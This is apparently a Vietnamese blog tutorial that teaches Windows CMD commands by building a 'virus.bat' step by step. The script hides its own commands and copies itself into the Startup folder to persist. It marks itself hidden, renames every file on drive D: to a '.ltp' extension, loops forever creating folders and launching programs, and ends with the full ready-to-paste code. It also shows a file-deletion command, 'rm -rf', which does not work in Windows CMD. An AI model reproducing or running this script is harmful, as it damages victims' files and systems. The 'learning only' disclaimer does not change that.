Qua bài viết này sẽ giúp các bạn nắm thêm kiến thức về các lệnh CMD trong Windows.

Trong bài này chúng ta sẽ học các lệnh cơ bản nhất của CMD, và tùy theo tư duy các bạn có thể phát triển để virus này nguy hiểm hơn. Tuy nhiên với mục đích là để tìm tòi nghiên cứu học hỏi chứ không phải phá hoại, do đó các bạn đừng nên sử dụng kiến thức của mình đi để phá người khác nhé.

B1: Chuẩn bị

  • Notepad
  • Mở CMD (nhấn phím Windows R, gõ lên cmd)
  • Dùng máy ảo hoặc ra quán net để test

Xác định thư mục làm việc

Trước tiên ta cần trỏ dấu nhắc lệnh về 1 đường dẫn cố định để dễ test. Trong bài này, mình sẽ để đường dẫn là ổ đĩa D: cho dễ quản lý

D:

B2: Tạo file virus.bat

Để tạo file trong cmd, ta có thể dùng 1 trong 2 lệnh sau

type nul > virus.bat
echo nul > virus.bat

B3: Viết nội dung vào file

Vì bài viết này sẽ hướng dẫn mọi người học về cmd nên sẽ sử dụng 100% cmd

Để viết 1 dòng vào file bằng cmd ta dùng lệnh

echo "dong 1" >> tên file
echo "dong 2" >> tên file
echo "dong 3" >> tên file

Mỗi câu lệnh sẽ ghi vào 1 dòng

Lưu ý:

  • 1 dấu > là tạo file
  • 2 dấu >> là thêm nội dung file

B4: Tắt hiển thị lệnh khi thực thi file

Điều này sẽ ẩn đi các lệnh mà hacker sử dụng, nhằm cho file trở lên hoàn thiện hơn, xem ví dụ sau:

@echo off: dùng để tắt hiển thị lệnh khi thực thi file

echo @echo off >> virus.bat

B5: Đổi màu chữ

Ta cần đổi màu chữ cho ngầu :)) sao cho giống hacker

Ví dụ: để chuyển chữ sang màu xanh lá cây, mã màu là số 2 thì ta gõ lệnh

echo color 2 >> virus.bat

B6: Tự khởi động cùng Windows

Thư mục khởi động của windows là : C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Do đó ta có thể copy con Virus này vào thư mục trên, sử dụng lệnh

echo copy virus.bat "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" >> virus.bat

Điều kiện: cmd được quyền chạy với vai trò admin (1 số máy sẽ không được bật)

B7: Virus ẩn mình

Để ẩn mình, tránh sự phát hiện bằng mắt thường, mình sẽ dùng lệnh attrib để tự đặt chế độ ẩn file.

Do đã copy vào thư mục Startup, nên cần phải di chuyển dấu nhắc đợi lệnh về thư mục đó, dùng lệnh cd để di chuyển dấu nhắc

echo cd "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" >> virus.bat

Tiếp đến dùng lệnh attrib để ẩn file

echo attrib +h virus.bat >> virus.bat

B8: Các tính năng của virus

Vòng lặp dùng goto label

Đây là 1 ví dụ bạn có thể thử (các bạn tự thêm echo "nội dung" >> virus.bat nhé)

D:
:label
md ltp%random% 
goto label

Lệnh trên sẽ:

  1. Vào ổ D:
  2. Tạo label
  3. Tạo 1 thư mục có phần đầu là ltp và random các số bất kì
  4. Quay lại label
  5. Tạo 1 thư mục có phần đầu là ltp và random các số bất kì
  6. Quay lại label
  7. . . .

Như vậy sẽ tạo 1 vòng lặp vô hạn

Xoá file

Nếu ác hacker có thể xoá hết file của nạn nhân, ở đây mình sẽ không làm như thế :))

rm -rf <tên folder>

Đổi đuôi file

Để tăng phần nguy hiểm cho Virus thì chúng ta sẽ cho đổi đuôi tất cả các File tìm thấy về 1 đuôi bất kì

rename *.* *.ltp

B9: chạy File

Để virus tự kích hoạt một file bất kỳ hoặc kích hoạt chính mình thì dùng lệnh start "tên chương trình"

Ví dụ: muốn Virus tự mở notepad hoặc chrome thì dùng lệnh

start notepad
start chrome

Muốn Virus tự kích hoạt bạn gõ

start virus.bat

B10: Code đây các ông

Ngoài cách viết từng lệnh trên cmd bạn có thể chỉnh sửa file dưới dạng notepad và paste code sau vào

@echo off
color 2
copy virus.bat "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
attrib +h "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\virus.bat"
D:
rename *.* *.ltp
:label
echo.Luc Thien Phong is Attacking . . .
md ltp%random% 
start notepad
start chrome
goto label

Lưu ý: Vui thôi đừng vui quá :))

Leave a Reply

This site uses cookies to offer you a better browsing experience. By browsing this website, you agree to our use of cookies.
x  Powerful Protection for WordPress, from Shield Security
This Site Is Protected By
Shield Security